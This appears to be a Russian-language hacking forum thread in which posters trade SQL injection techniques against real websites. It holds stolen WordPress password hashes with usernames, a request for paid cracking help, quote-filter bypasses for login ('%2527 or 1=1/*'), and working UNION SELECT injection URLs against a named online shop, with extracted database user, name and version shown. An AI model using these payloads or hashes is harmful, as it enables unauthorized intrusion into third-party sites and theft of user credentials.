Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует! А дальше ты хоть сам понял, что написал? Интересно, что тогда по твоему "information_schema", таблица чтоле? information_schema - это название стандартной БД в мускуле 5!)
Товарищи, прошу совета. Добил необходимый мне ресурс. Там стоит походу вродпресс. Вытащил значит следующие данные (логин::пасс) admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT. mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/ tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10 Это что вообще такое? Это расшифровать реально (если это вообще хэши)? Если да-то ткните как плз. Я просто первый раз столкнулся, в недоумении...
Значит PasswordsPro мне в руки и долгие годы ожидания и терпимости, или есть иные варианты? Сервисы не берут, в пассвордспро я такого типа хешей вообще не обнаружил, как md5(phpbb3) Кто может помочь? Об оплате договоримся
Пытаюсь авторизоватся по типу emailass Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются Как можно обойти фильтрацию и авторизоватся?
По всей видимости есть sql-инъекция, попробуй найти табличку юзеров/админов, там должно быть достаточно информации, чтобы пройти авторизацию ; )
будет работать когда обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример mail:[email protected]%2527 or 1=1/* pass:
c вами бесполезно спорить вы второй раз читаете пост по диагонали надо быть внимательнее. Ershik после обратного слеша одна ковычка? никак если данные не попадают в urldecode()
Понятно. еще вопрос. __http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* почему, когда хочу узнать версию базы данных, выскакиет ошибка? ___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt()) /add jokester опередил с примером '(
отлично помогает http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version()))),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* administrator@localhost:gestione:4.1.11-Debian_4sarge7-log И это тоже разумеется : http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
При исполнении следующих запросов : page.php?id=-1'+order+by+3/* : Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!) page.php?id=-1'+order+by+2/* Выдает : Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause Что это означает? И как это победить?
